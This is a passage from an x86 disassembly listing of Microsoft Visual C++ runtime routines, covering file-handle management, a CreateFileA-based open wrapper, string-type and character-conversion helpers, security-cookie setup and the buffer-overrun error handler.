sub_4267DE endp
; =============== S U B R O U T I N E =======================================
sub_42687B proc near ; CODE XREF: sub_426A43+20F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, ds:dword_4E2B98
push esi
push edi
jnb short loc_4268DB
mov ecx, eax
sar ecx, 5
mov esi, eax
and esi, 1Fh
lea edi, ds:4E2BA0h[ecx*4]
mov ecx, [edi]
shl esi, 3
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_4268DB
cmp ds:dword_4437C4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_4268D1
sub eax, 0
jz short loc_4268C8
dec eax
jz short loc_4268C3
dec eax
jnz short loc_4268D1
push ebx
push 0FFFFFFF4h
jmp short loc_4268CB
; ---------------------------------------------------------------------------
loc_4268C3: ; CODE XREF: sub_42687B+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_4268CB
; ---------------------------------------------------------------------------
loc_4268C8: ; CODE XREF: sub_42687B+3B�j
push ebx
push 0FFFFFFF6h
loc_4268CB: ; CODE XREF: sub_42687B+46�j
; sub_42687B+4B�j
call ds:dword_42B158 ; SetStdHandle
loc_4268D1: ; CODE XREF: sub_42687B+36�j
; sub_42687B+41�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_4268EF
; ---------------------------------------------------------------------------
loc_4268DB: ; CODE XREF: sub_42687B+C�j
; sub_42687B+28�j
and ds:dword_4E28F8, 0
mov ds:dword_4E28F4, 9
or eax, 0FFFFFFFFh
loc_4268EF: ; CODE XREF: sub_42687B+5E�j
pop edi
pop esi
retn
sub_42687B endp
; =============== S U B R O U T I N E =======================================
sub_4268F2 proc near ; CODE XREF: sub_420EE9+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, ds:dword_4E2B98
push esi
push edi
jnb short loc_426955
mov eax, ecx
sar eax, 5
mov esi, ecx
lea edi, ds:4E2BA0h[eax*4]
mov eax, [edi]
and esi, 1Fh
shl esi, 3
add eax, esi
test byte ptr [eax+4], 1
jz short loc_426955
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_426955
cmp ds:dword_4437C4, 1
jnz short loc_42694B
xor eax, eax
sub ecx, eax
jz short loc_426942
dec ecx
jz short loc_42693D
dec ecx
jnz short loc_42694B
push eax
push 0FFFFFFF4h
jmp short loc_426945
; ---------------------------------------------------------------------------
loc_42693D: ; CODE XREF: sub_4268F2+41�j
push eax
push 0FFFFFFF5h
jmp short loc_426945
; ---------------------------------------------------------------------------
loc_426942: ; CODE XREF: sub_4268F2+3E�j
push eax
push 0FFFFFFF6h
loc_426945: ; CODE XREF: sub_4268F2+49�j
; sub_4268F2+4E�j
call ds:dword_42B158 ; SetStdHandle
loc_42694B: ; CODE XREF: sub_4268F2+38�j
; sub_4268F2+44�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_426969
; ---------------------------------------------------------------------------
loc_426955: ; CODE XREF: sub_4268F2+C�j
; sub_4268F2+2A�j ...
and ds:dword_4E28F8, 0
mov ds:dword_4E28F4, 9
or eax, 0FFFFFFFFh
loc_426969: ; CODE XREF: sub_4268F2+61�j
pop edi
pop esi
retn
sub_4268F2 endp
; =============== S U B R O U T I N E =======================================
sub_42696C proc near ; CODE XREF: sub_420EE9+32�p
; sub_420EE9+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4E2B98
jnb short loc_426993
mov ecx, eax
sar ecx, 5
mov ecx, ds:dword_4E2BA0[ecx*4]
and eax, 1Fh
lea eax, [ecx+eax*8]
test byte ptr [eax+4], 1
jz short loc_426993
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_426993: ; CODE XREF: sub_42696C+A�j
; sub_42696C+22�j
and ds:dword_4E28F8, 0
mov ds:dword_4E28F4, 9
or eax, 0FFFFFFFFh
retn
sub_42696C endp
; ---------------------------------------------------------------------------
dd 424448Bh, 2B98053Bh, 3D73004Eh, 0F9C1C88Bh, 8D0C8B05h
dd 4E2BA0h, 0E283D08Bh, 0D144F61Fh, 25740104h, 0FF9AE850h
dd 5059FFFFh, 0B15415FFh, 0C0850042h, 15FF0875h, 42B01Ch
dd 0C03302EBh, 1274C085h, 4E28F8A3h, 0F405C700h, 9004E28h
dd 83000000h
db 0C8h, 0FFh, 0C3h
; =============== S U B R O U T I N E =======================================
sub_4269FF proc near ; CODE XREF: sub_421C63+34�p
; sub_422124+6F�p ...
arg_0 = dword ptr 4
inc ds:dword_4E2944
push 1000h
call sub_41E5D3
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_426A28
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_426A39
; ---------------------------------------------------------------------------
loc_426A28: ; CODE XREF: sub_4269FF+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_426A39: ; CODE XREF: sub_4269FF+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_4269FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426A43 proc near ; CODE XREF: sub_421F4A+137�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
test cl, cl
push esi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jns short loc_426A67
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_426A72
; ---------------------------------------------------------------------------
loc_426A67: ; CODE XREF: sub_426A43+19�j
mov [ebp+var_14], 1
mov [ebp+var_1], 0
loc_426A72: ; CODE XREF: sub_426A43+22�j
mov eax, 8000h
test ecx, eax
jnz short loc_426A8C
test ch, 40h
jnz short loc_426A88
cmp ds:dword_4E2B70, eax
jz short loc_426A8C
loc_426A88: ; CODE XREF: sub_426A43+3B�j
or [ebp+var_1], 80h
loc_426A8C: ; CODE XREF: sub_426A43+36�j
; sub_426A43+43�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_426AAF
dec eax
jz short loc_426AA6
dec eax
jnz short loc_426ACD
mov [ebp+var_10], 0C0000000h
jmp short loc_426AB6
; ---------------------------------------------------------------------------
loc_426AA6: ; CODE XREF: sub_426A43+55�j
mov [ebp+var_10], 40000000h
jmp short loc_426AB6
; ---------------------------------------------------------------------------
loc_426AAF: ; CODE XREF: sub_426A43+52�j
mov [ebp+var_10], 80000000h
loc_426AB6: ; CODE XREF: sub_426A43+61�j
; sub_426A43+6A�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_426AFC
cmp eax, 20h
jz short loc_426AF3
cmp eax, 30h
jz short loc_426AEA
cmp eax, 40h
jz short loc_426AE5
loc_426ACD: ; CODE XREF: sub_426A43+58�j
mov ds:dword_4E28F4, 16h
mov ds:dword_4E28F8, ebx
or eax, 0FFFFFFFFh
jmp loc_426CC4
; ---------------------------------------------------------------------------
loc_426AE5: ; CODE XREF: sub_426A43+88�j
mov [ebp+var_8], esi
jmp short loc_426AFF
; ---------------------------------------------------------------------------
loc_426AEA: ; CODE XREF: sub_426A43+83�j
mov [ebp+var_8], 2
jmp short loc_426AFF
; ---------------------------------------------------------------------------
loc_426AF3: ; CODE XREF: sub_426A43+7E�j
mov [ebp+var_8], 1
jmp short loc_426AFF
; ---------------------------------------------------------------------------
loc_426AFC: ; CODE XREF: sub_426A43+79�j
mov [ebp+var_8], ebx
loc_426AFF: ; CODE XREF: sub_426A43+A5�j
; sub_426A43+AE�j ...
mov eax, ecx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_426B46
jz short loc_426B41
cmp eax, ebx
jz short loc_426B41
cmp eax, edi
jz short loc_426B38
cmp eax, 200h
jz short loc_426B70
cmp eax, 300h
jnz short loc_426B58
mov [ebp+var_C], 2
jmp short loc_426B80
; ---------------------------------------------------------------------------
loc_426B38: ; CODE XREF: sub_426A43+DC�j
mov [ebp+var_C], 4
jmp short loc_426B80
; ---------------------------------------------------------------------------
loc_426B41: ; CODE XREF: sub_426A43+D4�j
; sub_426A43+D8�j
mov [ebp+var_C], esi
jmp short loc_426B80
; ---------------------------------------------------------------------------
loc_426B46: ; CODE XREF: sub_426A43+D2�j
cmp eax, 500h
jz short loc_426B79
cmp eax, 600h
jz short loc_426B70
cmp eax, edx
jz short loc_426B79
loc_426B58: ; CODE XREF: sub_426A43+EA�j
mov ds:dword_4E28F4, 16h
mov ds:dword_4E28F8, ebx
loc_426B68: ; CODE XREF: sub_426A43+2CB�j
or eax, 0FFFFFFFFh
jmp loc_426CC3
; ---------------------------------------------------------------------------
loc_426B70: ; CODE XREF: sub_426A43+E3�j
; sub_426A43+10F�j
mov [ebp+var_C], 5
jmp short loc_426B80
; ---------------------------------------------------------------------------
loc_426B79: ; CODE XREF: sub_426A43+108�j
; sub_426A43+113�j
mov [ebp+var_C], 1
loc_426B80: ; CODE XREF: sub_426A43+F3�j
; sub_426A43+FC�j ...
mov eax, [ebp+arg_4]
test eax, edi
mov esi, 80h
jz short loc_426B9E
mov ecx, ds:dword_4E28FC
not ecx
and ecx, [ebp+arg_C]
test cl, cl
js short loc_426B9E
xor esi, esi
inc esi
loc_426B9E: ; CODE XREF: sub_426A43+147�j
; sub_426A43+156�j
test al, 40h
jz short loc_426BB9
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp ds:dword_4E2900, 2
jnz short loc_426BB9
or [ebp+var_8], 4
loc_426BB9: ; CODE XREF: sub_426A43+15D�j
; sub_426A43+170�j
test ah, 10h
jz short loc_426BC0
or esi, edi
loc_426BC0: ; CODE XREF: sub_426A43+179�j
test al, 20h
jz short loc_426BCC
or esi, 8000000h
jmp short loc_426BD6
; ---------------------------------------------------------------------------
loc_426BCC: ; CODE XREF: sub_426A43+17F�j
test al, 10h
jz short loc_426BD6
or esi, 10000000h
loc_426BD6: ; CODE XREF: sub_426A43+187�j
; sub_426A43+18B�j
call sub_4267DE
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_426BFC
and ds:dword_4E28F8, 0
mov ds:dword_4E28F4, 18h
loc_426BF5: ; CODE XREF: sub_426A43+1F7�j
mov eax, edi
jmp loc_426CC3
; ---------------------------------------------------------------------------
loc_426BFC: ; CODE XREF: sub_426A43+19F�j
push 0
push esi
push [ebp+var_C]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_0]
call ds:dword_42B08C ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_426C2D
push esi
call ds:dword_42B184 ; GetFileType
test eax, eax
jnz short loc_426C3C
push esi
call ds:dword_42B004 ; CloseHandle
loc_426C2D: ; CODE XREF: sub_426A43+1D6�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
call sub_422C0F
pop ecx
jmp short loc_426BF5
; ---------------------------------------------------------------------------
loc_426C3C: ; CODE XREF: sub_426A43+1E1�j
cmp eax, 2
jnz short loc_426C47
or [ebp+var_1], 40h
jmp short loc_426C50
; ---------------------------------------------------------------------------
loc_426C47: ; CODE XREF: sub_426A43+1FC�j
cmp eax, 3
jnz short loc_426C50
or [ebp+var_1], 8
loc_426C50: ; CODE XREF: sub_426A43+202�j
; sub_426A43+207�j
push esi
push ebx
call sub_42687B
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, ebx
sar ecx, 5
or al, 1
mov esi, ebx
and esi, 1Fh
lea edi, ds:4E2BA0h[ecx*4]
mov ecx, [edi]
shl esi, 3
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [ecx+esi+4], al
jnz short loc_426CAC
test al, al
jns short loc_426CAC
test byte ptr [ebp+arg_4], 2
jz short loc_426CAC
push 2
push 0FFFFFFFFh
push ebx
call sub_42569D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_426CC8
cmp ds:dword_4E28F8, 83h
jnz short loc_426D07
loc_426CAC: ; CODE XREF: sub_426A43+23C�j
; sub_426A43+240�j ...
cmp [ebp+var_1], 0
jnz short loc_426CC1
test byte ptr [ebp+arg_4], 8
jz short loc_426CC1
mov eax, [edi]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_426CC1: ; CODE XREF: sub_426A43+26D�j
; sub_426A43+273�j
mov eax, ebx
loc_426CC3: ; CODE XREF: sub_426A43+128�j
; sub_426A43+1B4�j
pop edi
loc_426CC4: ; CODE XREF: sub_426A43+9D�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_426CC8: ; CODE XREF: sub_426A43+25B�j
push 1
lea eax, [ebp+var_2]
push eax
push ebx
mov [ebp+var_2], 0
call sub_421D41
add esp, 0Ch
test eax, eax
jnz short loc_426CF5
cmp [ebp+var_2], 1Ah
jnz short loc_426CF5
push [ebp+var_10]
push ebx
call sub_42884D
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_426D07
loc_426CF5: ; CODE XREF: sub_426A43+29A�j
; sub_426A43+2A0�j
push 0
push 0
push ebx
call sub_42569D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_426CAC
loc_426D07: ; CODE XREF: sub_426A43+267�j
; sub_426A43+2B0�j
push ebx
call sub_420EE9
pop ecx
jmp loc_426B68
sub_426A43 endp
; =============== S U B R O U T I N E =======================================
sub_426D13 proc near ; CODE XREF: sub_422124+64�p
; sub_422C6E+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4E2B98
jb short loc_426D22
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_426D22: ; CODE XREF: sub_426D13+A�j
mov ecx, eax
sar ecx, 5
mov ecx, ds:dword_4E2BA0[ecx*4]
and eax, 1Fh
movsx eax, byte ptr [ecx+eax*8+4]
and eax, 40h
retn
sub_426D13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426D3A proc near ; CODE XREF: sub_4222C8+343�p
; sub_4222C8+74A�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_426D4B
xor eax, eax
jmp short loc_426D9D
; ---------------------------------------------------------------------------
loc_426D4B: ; CODE XREF: sub_426D3A+B�j
cmp ds:dword_4E29A4, esi
jnz short loc_426D65
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_426D90
mov [eax], cl
xor eax, eax
inc eax
jmp short loc_426D9D
; ---------------------------------------------------------------------------
loc_426D65: ; CODE XREF: sub_426D3A+17�j
lea ecx, [ebp+arg_0]
push ecx
push esi
push ds:dword_4437B0
mov [ebp+arg_0], esi
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push esi
push ds:dword_4E29B4
call ds:dword_42B090 ; WideCharToMultiByte
cmp eax, esi
jz short loc_426D90
cmp [ebp+arg_0], esi
jz short loc_426D9D
loc_426D90: ; CODE XREF: sub_426D3A+22�j
; sub_426D3A+4F�j
mov ds:dword_4E28F4, 2Ah
or eax, 0FFFFFFFFh
loc_426D9D: ; CODE XREF: sub_426D3A+F�j
; sub_426D3A+29�j ...
pop esi
pop ebp
retn
sub_426D3A endp
; =============== S U B R O U T I N E =======================================
sub_426DA0 proc near ; CODE XREF: sub_422AC2+4F�p
; sub_422B91+67�p ...
push 1Ch
push offset dword_43A058
call sub_425F14
xor esi, esi
cmp ds:dword_4E2AD8, esi
jnz short loc_426DEB
lea eax, [ebp-1Ch]
push eax
xor edi, edi
inc edi
push edi
push offset dword_439C24
push edi
call ds:dword_42B14C ; GetStringTypeW
test eax, eax
jz short loc_426DD6
mov ds:dword_4E2AD8, edi
jmp short loc_426DEB
; ---------------------------------------------------------------------------
loc_426DD6: ; CODE XREF: sub_426DA0+2C�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_426DEB
mov ds:dword_4E2AD8, 2
loc_426DEB: ; CODE XREF: sub_426DA0+14�j
; sub_426DA0+34�j ...
mov eax, ds:dword_4E2AD8
cmp eax, 2
jz loc_426EE3
cmp eax, esi
jz loc_426EE3
cmp eax, 1
jnz loc_426F09
mov [ebp-24h], esi
mov [ebp-20h], esi
cmp [ebp+18h], esi
jnz short loc_426E1D
mov eax, ds:dword_4E29B4
mov [ebp+18h], eax
loc_426E1D: ; CODE XREF: sub_426DA0+73�j
push esi
push esi
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
xor eax, eax
cmp [ebp+20h], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push dword ptr [ebp+18h]
call ds:dword_42B07C ; MultiByteToWideChar
mov edi, eax
mov [ebp-28h], edi
test edi, edi
jz loc_426F09
and dword ptr [ebp-4], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov esi, esp
mov [ebp-2Ch], esi
push ebx
push 0
push esi
call sub_41E5F0
add esp, 0Ch
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_426E8E
; ---------------------------------------------------------------------------
db 33h, 0C0h, 40h
dd 0E8658BC3h, 0FFEBEDE8h, 83F633FFh, 8BFFFC4Dh
db 7Dh, 0D8h
; ---------------------------------------------------------------------------
loc_426E8E: ; CODE XREF: sub_426DA0+D7�j
test esi, esi
jnz short loc_426EA9
push edi
push 2
call sub_4205E4
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_426F09
mov dword ptr [ebp-20h], 1
loc_426EA9: ; CODE XREF: sub_426DA0+F0�j
push edi
push esi
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push 1
push dword ptr [ebp+18h]
call ds:dword_42B07C ; MultiByteToWideChar
test eax, eax
jz short loc_426ED1
push dword ptr [ebp+14h]
push eax
push esi
push dword ptr [ebp+8]
call ds:dword_42B14C ; GetStringTypeW
mov [ebp-24h], eax
loc_426ED1: ; CODE XREF: sub_426DA0+11E�j
cmp dword ptr [ebp-20h], 0
jz short loc_426EDE
push esi
call sub_41E2A1
pop ecx
loc_426EDE: ; CODE XREF: sub_426DA0+135�j
mov eax, [ebp-24h]
jmp short loc_426F51
; ---------------------------------------------------------------------------
loc_426EE3: ; CODE XREF: sub_426DA0+53�j
; sub_426DA0+5B�j
mov ebx, [ebp+1Ch]
cmp ebx, esi
jnz short loc_426EF0
mov ebx, ds:dword_4E29A4
loc_426EF0: ; CODE XREF: sub_426DA0+148�j
mov edi, [ebp+18h]
test edi, edi
jnz short loc_426EFD
mov edi, ds:dword_4E29B4
loc_426EFD: ; CODE XREF: sub_426DA0+155�j
push ebx
call sub_4282DB
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_426F0D
loc_426F09: ; CODE XREF: sub_426DA0+64�j
; sub_426DA0+A5�j ...
xor eax, eax
jmp short loc_426F51
; ---------------------------------------------------------------------------
loc_426F0D: ; CODE XREF: sub_426DA0+167�j
cmp eax, edi
jz short loc_426F2F
push 0
push 0
lea ecx, [ebp+10h]
push ecx
push dword ptr [ebp+0Ch]
push eax
push edi
call sub_42831E
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_426F09
mov [ebp+0Ch], esi
loc_426F2F: ; CODE XREF: sub_426DA0+16F�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
push ebx
call ds:dword_42B150 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_426F4F
push esi
call sub_41E2A1
pop ecx
loc_426F4F: ; CODE XREF: sub_426DA0+1A6�j
mov eax, edi
loc_426F51: ; CODE XREF: sub_426DA0+141�j
; sub_426DA0+16B�j
lea esp, [ebp-38h]
call sub_425F4F
retn
sub_426DA0 endp
; ---------------------------------------------------------------------------
loc_426F5A: ; DATA XREF: seg002:0043C004�o
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_4437D4
test eax, eax
jz short loc_426F70
cmp eax, 0BB40E64Eh
jnz short locret_426FBE
loc_426F70: ; CODE XREF: seg000:00426F67�j
push esi
lea eax, [ebp-8]
push eax
call ds:dword_42B198 ; GetSystemTimeAsFileTime
mov esi, [ebp-4]
xor esi, [ebp-8]
call ds:dword_42B044 ; GetCurrentProcessId
xor esi, eax
call ds:dword_42B148 ; GetCurrentThreadId
xor esi, eax
call ds:dword_42B038 ; GetTickCount
xor esi, eax
lea eax, [ebp-10h]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
mov eax, [ebp-0Ch]
xor eax, [ebp-10h]
xor esi, eax
mov ds:dword_4437D4, esi
jnz short loc_426FBD
mov ds:dword_4437D4, 0BB40E64Eh
loc_426FBD: ; CODE XREF: seg000:00426FB1�j
pop esi
locret_426FBE: ; CODE XREF: seg000:00426F6E�j
leave
retn
; =============== S U B R O U T I N E =======================================
sub_426FC0 proc near ; CODE XREF: sub_422B83-1D�p
push 118h
push offset dword_43A208
call sub_425F14
mov eax, ds:dword_4437D4
mov [ebp-1Ch], eax
mov eax, ds:dword_4E2ADC
xor ecx, ecx
cmp eax, ecx
jz short loc_427001
mov [ebp-4], ecx
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
pop ecx
pop ecx
or dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_427100
; ---------------------------------------------------------------------------
dd 0C340C033h, 0EBE8658Bh
db 0EEh
; ---------------------------------------------------------------------------
loc_427001: ; CODE XREF: sub_426FC0+20�j
mov eax, [ebp+8]
dec eax
jz short loc_42701D
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov dword ptr [ebp-128h], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_427031
; ---------------------------------------------------------------------------
loc_42701D: ; CODE XREF: sub_426FC0+45�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov dword ptr [ebp-128h], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_427031: ; CODE XREF: sub_426FC0+5B�j
mov [ebp-20h], cl
push 104h
lea eax, [ebp-124h]
push eax
push ecx
call ds:dword_42B00C ; GetModuleFileNameA
test eax, eax
jnz short loc_42705E
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp-124h]
push eax
call sub_41EEC0
pop ecx
pop ecx
loc_42705E: ; CODE XREF: sub_426FC0+89�j
lea ebx, [ebp-124h]
mov eax, ebx
push eax
call sub_41E1C0
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_42709A
mov eax, ebx
push eax
call sub_41E1C0
mov ebx, eax
lea eax, [ebp-124h]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_41E860
add esp, 10h
loc_42709A: ; CODE XREF: sub_426FC0+B3�j
push ebx
call sub_41E1C0
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov esi, esp
push edi
push esi
call sub_41EEC0
mov edi, offset asc_43A018 ; "\n\n"
push edi
push esi
call sub_41EED0
push offset aProgram ; "Program: "
push esi
call sub_41EED0
push ebx
push esi
call sub_41EED0
push edi
push esi
call sub_41EED0
push dword ptr [ebp-128h]
push esi
call sub_41EED0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_428710
add esp, 3Ch
loc_427100: ; CODE XREF: sub_426FC0+33�j
push 3
call sub_41F282
int 3 ; Trap to Debugger
sub_426FC0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427108 proc near ; CODE XREF: sub_42319B+7�p
arg_0 = dword ptr 4
cmp ds:dword_4E2F00, 3
push esi
jnz short loc_42712C
mov esi, [esp+4+arg_0]
push esi
call sub_421188
test eax, eax
pop ecx
jz short loc_427129
mov eax, [esi-4]
sub eax, 9
pop esi
retn
; ---------------------------------------------------------------------------
loc_427129: ; CODE XREF: sub_427108+17�j
push esi
jmp short loc_427130
; ---------------------------------------------------------------------------
loc_42712C: ; CODE XREF: sub_427108+8�j
push [esp+4+arg_0]
loc_427130: ; CODE XREF: sub_427108+22�j
push 0
push ds:dword_4E2EFC
call ds:dword_42B144 ; RtlSizeHeap
pop esi
retn
sub_427108 endp
; =============== S U B R O U T I N E =======================================
sub_427140 proc near ; CODE XREF: sub_423327+A5�p
; sub_423327+575�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_42718C
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_42715E
test al, al
jns short loc_42718C
test al, 2
jnz short loc_42718C
loc_42715E: ; CODE XREF: sub_427140+14�j
cmp dword ptr [esi+8], 0
jnz short loc_42716B
push esi
call sub_4269FF
pop ecx
loc_42716B: ; CODE XREF: sub_427140+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_42717B
cmp dword ptr [esi+4], 0
jnz short loc_42718C
inc eax
mov [esi], eax
loc_42717B: ; CODE XREF: sub_427140+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_427192
cmp [eax], bl
jz short loc_427194
inc eax
mov [esi], eax
loc_42718C: ; CODE XREF: sub_427140+9�j
; sub_427140+18�j ...
or eax, 0FFFFFFFFh
loc_42718F: ; CODE XREF: sub_427140+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_427192: ; CODE XREF: sub_427140+43�j
mov [eax], bl
loc_427194: ; CODE XREF: sub_427140+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_42718F
sub_427140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4271AC proc near ; CODE XREF: sub_423327+8A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_4271CF
cmp [ebp+arg_8], ebx
jz short loc_4271CF
mov al, [esi]
cmp al, bl
jnz short loc_4271D5
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4271CF
mov [eax], bx
loc_4271CF: ; CODE XREF: sub_4271AC+C�j
; sub_4271AC+11�j ...
xor eax, eax
loc_4271D1: ; CODE XREF: sub_4271AC+42�j
; sub_4271AC+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4271D5: ; CODE XREF: sub_4271AC+17�j
cmp ds:dword_4E29A4, ebx
jnz short loc_4271F0
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_4271EB
movzx ax, al
mov [ecx], ax
loc_4271EB: ; CODE XREF: sub_4271AC+36�j
; sub_4271AC+C0�j
xor eax, eax
inc eax
jmp short loc_4271D1
; ---------------------------------------------------------------------------
loc_4271F0: ; CODE XREF: sub_4271AC+2F�j
mov ecx, ds:off_4437D8
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42724D
mov eax, ds:dword_4437B0
cmp eax, 1
jle short loc_427234
cmp [ebp+arg_8], eax
jl short loc_427237
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push ds:dword_4E29B4
call ds:dword_42B07C ; MultiByteToWideChar
test eax, eax
mov eax, ds:dword_4437B0
jnz short loc_4271D1
loc_427234: ; CODE XREF: sub_4271AC+5C�j
cmp [ebp+arg_8], eax
loc_427237: ; CODE XREF: sub_4271AC+61�j
jb short loc_42723E
cmp [esi+1], bl
jnz short loc_4271D1
loc_42723E: ; CODE XREF: sub_4271AC:loc_427237�j
; sub_4271AC+C6�j
mov ds:dword_4E28F4, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4271D1
; ---------------------------------------------------------------------------
loc_42724D: ; CODE XREF: sub_4271AC+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push ds:dword_4E29B4
call ds:dword_42B07C ; MultiByteToWideChar
test eax, eax
jnz loc_4271EB
jmp short loc_42723E
sub_4271AC endp
; =============== S U B R O U T I N E =======================================
sub_427274 proc near ; CODE XREF: sub_424391+11A�p
; sub_424391+1D5�p ...
xor eax, eax
retn
sub_427274 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427277 proc near ; CODE XREF: sub_427885+4A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
push ebx
xor ebx, ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
push esi
inc ebx
test cl, 10h
push edi
jz short loc_4272A9
mov eax, [ebp+arg_0]
